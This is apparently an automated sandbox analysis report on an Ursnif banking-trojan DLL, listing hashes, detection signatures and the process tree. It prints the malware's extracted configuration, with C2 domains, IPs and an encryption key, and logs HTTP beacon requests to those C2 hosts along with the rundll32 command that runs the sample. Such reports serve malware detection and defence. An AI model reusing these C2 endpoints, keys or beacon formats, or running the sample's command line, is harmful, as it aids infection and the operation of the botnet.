
Windows Analysis Report
hFGZpat9Mf.dll

Overview

General Information

Sample Name: hFGZpat9Mf.dll
Analysis ID: 560543
MD5: 9acde2c3e3a375590a1bc716eabc52c5
SHA1: e231c9ae802a9aad9916f08256f7558f531d54ce
SHA256: 57f997217db22a4d97700768189d44034303e3b15dc08fa48ed6b91bd7051c05
Tags: dll, Gozi, ISFB, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Sigma detected: Suspicious Call by Ordinal
Writes registry values via WMI
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality to record screenshots
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 988 cmdline: loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 5904 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 3272 cmdline: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 4496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Ursnif: {"RSA Public Key": "a/OOe3vutyE+gNUF58s+932DNMr8fczoarMUDWqkJsUgObu+3KDuWCwO4VJi2nQNFoXQ13xL3U4zAT7teC979D2YSjTERxwWBeeP0HeZqNq0qcAgYIwsDRVFhGgIWRlndn894LdhC+W8uyATPg1or5n2yZWlh+/NEBJX1nFopQ/z09NIGZPpSgelgd7Gl3dRww5rEsR2WK4eL7TmnaoLNu6StWcVsJ2/hdx1IvAw+0FHXO2OQVeCIyD0YqFOgVX4yIlMXSNJExST4L1Wc5wBukAkkdIxFsm7gsamW82tEhFe2W5TqQV7VVRxRARRhHVoEwzsqj+Q49089Kkixnoy1HXPNrN04rhNhyDNba5DkKY=", "c2_domain": ["config.edge.skype.com", "194.76.226.200", "giporedtrip.at", "habpfans.at", "31.214.157.187"], "botnet": "3000", "server": "50", "serpent_key": "YFyLBjaJo8V90gKm", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara matches in memory dumps

Source | Rule | Description | Author | Strings
00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | 
00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | 
00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | 
00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | 
00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | 
(19 further entries not shown)

Yara matches in unpacked PEs

Source | Rule | Description | Author | Strings
3.2.rundll32.exe.ee0000.2.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | 
3.0.rundll32.exe.ee0000.6.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | 
3.2.rundll32.exe.1080000.3.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | 
3.0.rundll32.exe.1080000.3.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | 
0.2.loaddll32.exe.9e0000.3.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | 
(14 further entries not shown)

System Summary

Source: Process started | Author: Florian Roth | Data: Command: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5904, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1, ProcessId: 3272

AV Detection

Source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "a/OOe3vutyE+gNUF58s+932DNMr8fczoarMUDWqkJsUgObu+3KDuWCwO4VJi2nQNFoXQ13xL3U4zAT7teC979D2YSjTERxwWBeeP0HeZqNq0qcAgYIwsDRVFhGgIWRlndn894LdhC+W8uyATPg1or5n2yZWlh+/NEBJX1nFopQ/z09NIGZPpSgelgd7Gl3dRww5rEsR2WK4eL7TmnaoLNu6StWcVsJ2/hdx1IvAw+0FHXO2OQVeCIyD0YqFOgVX4yIlMXSNJExST4L1Wc5wBukAkkdIxFsm7gsamW82tEhFe2W5TqQV7VVRxRARRhHVoEwzsqj+Q49089Kkixnoy1HXPNrN04rhNhyDNba5DkKY=", "c2_domain": ["config.edge.skype.com", "194.76.226.200", "giporedtrip.at", "habpfans.at", "31.214.157.187"], "botnet": "3000", "server": "50", "serpent_key": "YFyLBjaJo8V90gKm", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source: hFGZpat9Mf.dll | Virustotal: Detection: 20%
Source: hFGZpat9Mf.dll | ReversingLabs: Detection: 32%
Source: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk | Avira URL Cloud: Label: malware
Source: http://giporedtrip.at/drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk | Avira URL Cloud: Label: malware
Source: http://habpfans.at/ | Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w | Avira URL Cloud: Label: malware
Source: http://giporedtrip.at/drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk | Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk | Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/ | Avira URL Cloud: Label: malware
Source: http://habpfans.at/g | Avira URL Cloud: Label: malware
Source: giporedtrip.at | Virustotal: Detection: 11%
Source: habpfans.at | Virustotal: Detection: 11%
Source: hFGZpat9Mf.dll | Joe Sandbox ML: detected
Source: 3.0.rundll32.exe.1080000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.890184.1.unpack | Avira: Label: TR/Kazy.4159236
Source: 3.0.rundll32.exe.ed0184.5.unpack | Avira: Label: TR/Kazy.4159236
Source: 3.0.rundll32.exe.ed0184.1.unpack | Avira: Label: TR/Kazy.4159236
Source: 3.2.rundll32.exe.1080000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.9e0000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.0.rundll32.exe.1080000.7.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.2.rundll32.exe.ed0184.1.unpack | Avira: Label: TR/Kazy.4159236
Source: hFGZpat9Mf.dll | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.261009852.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdbl source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: version.pdb` source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdbv source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdbj source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdbr source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: comctl32v582.pdbg source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_007053C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E153C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,

Networking

Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49753 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49758 -> 194.76.226.200:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49771 -> 211.119.84.112:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49771 -> 211.119.84.112:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49781 -> 41.41.255.235:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49812 -> 31.214.157.187:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49812 -> 31.214.157.187:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49814 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49825 -> 181.129.180.251:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49827 -> 61.36.14.230:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49828 -> 31.214.157.187:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49829 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49829 -> 13.107.43.16:80
Source: Joe Sandbox View | ASN Name: EPMTelecomunicacionesSAESPCO
Source: Joe Sandbox View | ASN Name: TE-ASTE-ASEG
Source: Joe Sandbox View | IP Address: 181.129.180.251
Source: global traffic | HTTP traffic detected: GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 194.76.226.200
Source: global traffic | HTTP traffic detected: GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: giporedtrip.at
Source: global traffic | HTTP traffic detected: GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: habpfans.at
Source: global traffic | HTTP traffic detected: GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 31.214.157.187
Source: global traffic | HTTP traffic detected: GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 194.76.226.200
Source: global traffic | HTTP traffic detected: GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: giporedtrip.at
Source: global traffic | HTTP traffic detected: GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: habpfans.at
Source: global traffic | HTTP traffic detected: GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 31.214.157.187
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Wed, 26 Jan 2022 16:03:50 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 548 | Connection: keep-alive | Vary: Accept-Encoding | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Wed, 26 Jan 2022 16:04:12 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 548 | Connection: close | Vary: Accept-Encoding | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
